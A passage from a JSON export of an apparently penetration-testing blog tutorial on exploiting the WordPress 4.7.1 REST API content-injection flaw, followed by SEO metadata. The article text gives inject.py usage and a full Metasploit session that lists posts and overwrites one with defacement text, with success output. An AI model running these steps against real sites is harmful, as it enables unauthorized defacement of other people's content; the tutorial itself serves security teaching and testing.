user@workstation:~> python inject.py \nUsage: inject.py <url> (optional: <post_id> <file with post_content>)\nuser@workstation:~>\n<\/pre>\n<\/blockquote>\n<\/div>\n
As you can see you have to provide an URL, a POST-ID and a content file.<\/p>\n
You can find out the POST-ID of a specific post you want to modify by simply running:<\/p>\n
\n
\n
user@workstation:~> python inject.py http:\/\/chit-test.ch\n* Discovering API Endpoint\n* API lives at: http:\/\/chit-test.ch\/wp-json\/\n* Getting available posts\n - Post ID: 1, Title: Ciao mondo!, Url: http:\/\/chit-test.ch\/ciao-mondo\/\nuser@workstation:~>\n<\/pre>\n<\/blockquote>\n<\/div>\n
Now, you have to create a text file which contains the content you wish to inject.<\/p>\n
\n
\n
user@workstation:~> vi content\n<\/pre>\n<\/blockquote>\n<\/div>\n
Run inject.py as follow:<\/p>\n
\n
\n
user@workstation:~> python inject.py http:\/\/chit-test.ch 1 content\n* Discovering API Endpoint\n* API lives at: http:\/\/chit-test.ch\/wp-json\/\n* Updating post 1\n* Post updated. Check it out at http:\/\/chit-test.ch\/ciao-mondo\/\n* Update complete!\nuser@workstation:~>\n<\/pre>\n<\/blockquote>\n<\/div>\n
WordPress REST API Content Injection Exploit with Metsploit<\/h3>\n
To exploit this vulnerability<\/b> you can also use the following Metasploit<\/b> module: auxiliary\/scanner\/http\/wordpress_content_injection<\/b>.<\/p>\n
To find out the Post-ID you can run: “set ACTION LIST<\/b>“. For more information about this module visit:
\nWordPress Content Injection – rapid7.com<\/a><\/p>\n
\n
\n
msf > use auxiliary\/scanner\/http\/wordpress_content_injection\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > show actions\n\nAuxiliary actions:\n\nName    Description\n----    -----------\nLIST    List posts\nUPDATE  Update post\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set ACTION LIST\nACTION => LIST\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set RHOSTS chit-test.ch\nRHOSTS => chit-test.ch\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > show options\n\nModule options (auxiliary\/scanner\/http\/wordpress_content_injection):\n\nName           Current Setting  Required  Description\n----           ---------------  --------  -----------\nPOST_CONTENT                    no        Post content\nPOST_ID        0                no        Post ID (0 for all)\nPOST_PASSWORD                   no        Post password ('' for none)\nPOST_TITLE                      no        Post title\nProxies                         no        A proxy chain of format type:host:port[,type:host:port][...]\nRHOSTS         chit-test.ch     yes       The target address range or CIDR identifier\nRPORT          80               yes       The target port (TCP)\nSSL            false            no        Negotiate SSL\/TLS for outgoing connections\nTARGETURI      \/                yes       The base path to the wordpress application\nTHREADS        1                yes       The number of concurrent threads\nVHOST                           no        HTTP server virtual host\n\nAuxiliary action:\n\nName  Description\n----  -----------\nLIST  List posts\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > run\n\nPosts at http:\/\/10.10.10.4\/ (REST API: \/wp-json\/wp\/v2)\n======================================================\n\nID  Title                 URL                              Password\n--  -----                 ---                              --------\n1   Ciao mondo!  http:\/\/chit-test.ch\/ciao-mondo\/  No\n\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf auxiliary(scanner\/http\/wordpress_content_injection) >\n<\/pre>\n<\/blockquote>\n<\/div>\n
After finding out the POST_ID of the article\/page you wish to modify you can set actions to UPDATE and insert all the information needed like POST_ID, POST_CONTENT, POST_TITLE etc.<\/p>\n
\n
\n
msf auxiliary(scanner\/http\/wordpress_content_injection) > set ACTION UPDATE\nACTION => UPDATE\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set POST_CONTENT \"Sei stato hackerato, aggiorna WordPress!\"\nPOST_CONTENT => Sei stato hackerato, aggiorna WordPress!\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set POST_TITLE \"Sei stato hackerato!\"\nPOST_TITLE => Sei stato hackerato!\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > set POST_ID 1\nPOST_ID => 1\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > show options\n\nModule options (auxiliary\/scanner\/http\/wordpress_content_injection):\n\n   Name           Current Setting                           Required  Description\n   ----           ---------------                           --------  -----------\n   POST_CONTENT   Sei stato hackerato, aggiorna WordPress!  no        Post content\n   POST_ID        1                                         no        Post ID (0 for all)\n   POST_PASSWORD                                            no        Post password ('' for none)\n   POST_TITLE     Sei stato hackerato!                      no        Post title\n   Proxies                                                  no        A proxy chain of format type:host:port[,type:host:port][...]\n   RHOSTS         chit-test.ch                              yes       The target address range or CIDR identifier\n   RPORT          80                                        yes       The target port (TCP)\n   SSL            false                                     no        Negotiate SSL\/TLS for outgoing connections\n   TARGETURI      \/                                         yes       The base path to the wordpress application\n   THREADS        1                                         yes       The number of concurrent threads\n   VHOST                                                    no        HTTP server virtual host\n\n\nAuxiliary action:\n\n   Name    Description\n   ----    -----------\n   UPDATE  Update post\n\n\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > run\n\n[+] SUCCESS: http:\/\/10.10.10.4\/?p=1 (Post updated)\n[*] Scanned 1 of 1 hosts (100% complete)\n[*] Auxiliary module execution completed\nmsf auxiliary(scanner\/http\/wordpress_content_injection) > \n<\/pre>\n<\/blockquote>\n<\/div>\n
After successfully running this WordPress exploit<\/b> you will see that the targeted web-site\/blog content has been modified.<\/p>\n
\"WordPress<\/p>\n","protected":false},"excerpt":{"rendered":"
This tutorial is intended for educational and instructional purposes only. Please do not use any of the techniques or tools described here to attempt to break into systems without proper authorization. This is a tutorial on how to exploit some vulnerabilities present in the 4.7.1 version of WordPress, it is intended to give you an…<\/p>\n
Read More “Hacking WordPress – Content Injection Exploit and DoS”<\/span> »<\/a><\/p>","protected":false},"author":5,"featured_media":1831,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[268,297,144],"tags":[291,121,21,113,282,296,295,2],"class_list":["post-1853","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-ethical-hacking-penetration-testing","category-tutorials","category-articoli-wordpress","tag-content-injection","tag-dos","tag-exploit","tag-hacking","tag-metasploit","tag-pentration-test","tag-scurity","tag-wordpress"],"yoast_head":"\nHacking WordPress - Content Injection Exploit and DoS • CHIT<\/title>\n<meta name=\"description\" content=\"Tutorial on how to perform a penetration test on WordPress using wpscan and Metasploit.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/christeninformatica.ch\/it\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/\" \/>\n<meta property=\"og:locale\" content=\"it_IT\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Hacking WordPress - Content Injection Exploit and DoS • CHIT\" \/>\n<meta property=\"og:description\" content=\"Tutorial on how to perform a penetration test on WordPress using wpscan and Metasploit.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/christeninformatica.ch\/it\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/\" \/>\n<meta property=\"og:site_name\" content=\"CHIT\" \/>\n<meta property=\"article:published_time\" content=\"2023-04-19T04:59:59+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2026-04-01T20:34:21+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"730\" \/>\n\t<meta property=\"og:image:height\" content=\"532\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"chitblog\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"chitblog\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"3 minuti\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/\"},\"author\":{\"name\":\"chitblog\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\"},\"headline\":\"Hacking WordPress – Content Injection Exploit and DoS\",\"datePublished\":\"2023-04-19T04:59:59+00:00\",\"dateModified\":\"2026-04-01T20:34:21+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/\"},\"wordCount\":441,\"commentCount\":0,\"image\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/wordpress-content-injection-exploit-metasploit-module-1.jpg\",\"keywords\":[\"Content Injection\",\"DOS\",\"exploit\",\"hacking\",\"Metasploit\",\"Pentration Test\",\"Scurity\",\"Wordpress\"],\"articleSection\":[\"Ethical Hacking \\\/ Penetration Testing\",\"Tutorials\",\"WordPress\"],\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/\",\"name\":\"Hacking WordPress - Content Injection Exploit and DoS • CHIT\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/#primaryimage\"},\"image\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/#primaryimage\"},\"thumbnailUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/wordpress-content-injection-exploit-metasploit-module-1.jpg\",\"datePublished\":\"2023-04-19T04:59:59+00:00\",\"dateModified\":\"2026-04-01T20:34:21+00:00\",\"author\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\"},\"description\":\"Tutorial on how to perform a penetration test on WordPress using wpscan and Metasploit.\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/#breadcrumb\"},\"inLanguage\":\"it-IT\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/#primaryimage\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/wordpress-content-injection-exploit-metasploit-module-1.jpg\",\"contentUrl\":\"https:\\\/\\\/christeninformatica.ch\\\/media\\\/wordpress-content-injection-exploit-metasploit-module-1.jpg\",\"width\":730,\"height\":532},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\\\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/christeninformatica.ch\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Hacking WordPress – Content Injection Exploit and DoS\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#website\",\"url\":\"https:\\\/\\\/christeninformatica.ch\\\/\",\"name\":\"CHIT\",\"description\":\"\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/christeninformatica.ch\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"it-IT\"},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/christeninformatica.ch\\\/#\\\/schema\\\/person\\\/b0952e900860b424a6b0906f1d6a0a64\",\"name\":\"chitblog\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"it-IT\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g\",\"caption\":\"chitblog\"}}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Hacking WordPress - Content Injection Exploit and DoS • CHIT","description":"Tutorial on how to perform a penetration test on WordPress using wpscan and Metasploit.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/christeninformatica.ch\/it\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/","og_locale":"it_IT","og_type":"article","og_title":"Hacking WordPress - Content Injection Exploit and DoS • CHIT","og_description":"Tutorial on how to perform a penetration test on WordPress using wpscan and Metasploit.","og_url":"https:\/\/christeninformatica.ch\/it\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/","og_site_name":"CHIT","article_published_time":"2023-04-19T04:59:59+00:00","article_modified_time":"2026-04-01T20:34:21+00:00","og_image":[{"width":730,"height":532,"url":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","type":"image\/jpeg"}],"author":"chitblog","twitter_card":"summary_large_image","twitter_misc":{"Written by":"chitblog","Est. reading time":"3 minuti"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/#article","isPartOf":{"@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/"},"author":{"name":"chitblog","@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64"},"headline":"Hacking WordPress – Content Injection Exploit and DoS","datePublished":"2023-04-19T04:59:59+00:00","dateModified":"2026-04-01T20:34:21+00:00","mainEntityOfPage":{"@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/"},"wordCount":441,"commentCount":0,"image":{"@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/#primaryimage"},"thumbnailUrl":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","keywords":["Content Injection","DOS","exploit","hacking","Metasploit","Pentration Test","Scurity","Wordpress"],"articleSection":["Ethical Hacking \/ Penetration Testing","Tutorials","WordPress"],"inLanguage":"it-IT","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/","url":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/","name":"Hacking WordPress - Content Injection Exploit and DoS • CHIT","isPartOf":{"@id":"https:\/\/christeninformatica.ch\/#website"},"primaryImageOfPage":{"@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/#primaryimage"},"image":{"@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/#primaryimage"},"thumbnailUrl":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","datePublished":"2023-04-19T04:59:59+00:00","dateModified":"2026-04-01T20:34:21+00:00","author":{"@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64"},"description":"Tutorial on how to perform a penetration test on WordPress using wpscan and Metasploit.","breadcrumb":{"@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/#breadcrumb"},"inLanguage":"it-IT","potentialAction":[{"@type":"ReadAction","target":["https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/"]}]},{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/#primaryimage","url":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","contentUrl":"https:\/\/christeninformatica.ch\/media\/wordpress-content-injection-exploit-metasploit-module-1.jpg","width":730,"height":532},{"@type":"BreadcrumbList","@id":"https:\/\/christeninformatica.ch\/hacking-wordpress-content-injection-exploit-and-dos-penetration-testing-wpscan-metasploit\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/christeninformatica.ch\/"},{"@type":"ListItem","position":2,"name":"Hacking WordPress – Content Injection Exploit and DoS"}]},{"@type":"WebSite","@id":"https:\/\/christeninformatica.ch\/#website","url":"https:\/\/christeninformatica.ch\/","name":"CHIT","description":"","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/christeninformatica.ch\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"it-IT"},{"@type":"Person","@id":"https:\/\/christeninformatica.ch\/#\/schema\/person\/b0952e900860b424a6b0906f1d6a0a64","name":"chitblog","image":{"@type":"ImageObject","inLanguage":"it-IT","@id":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/321ffb3802ecc0a2fc461c52e31fbbabb19873df19bfb793c8e64c6a0cc49313?s=96&d=identicon&r=g","caption":"chitblog"}}]}},"_links":{"self":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts\/1853","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/comments?post=1853"}],"version-history":[{"count":0,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/posts\/1853\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/media\/1831"}],"wp:attachment":[{"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/media?parent=1853"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/categories?post=1853"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/christeninformatica.ch\/it\/wp-json\/wp\/v2\/tags?post=1853"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}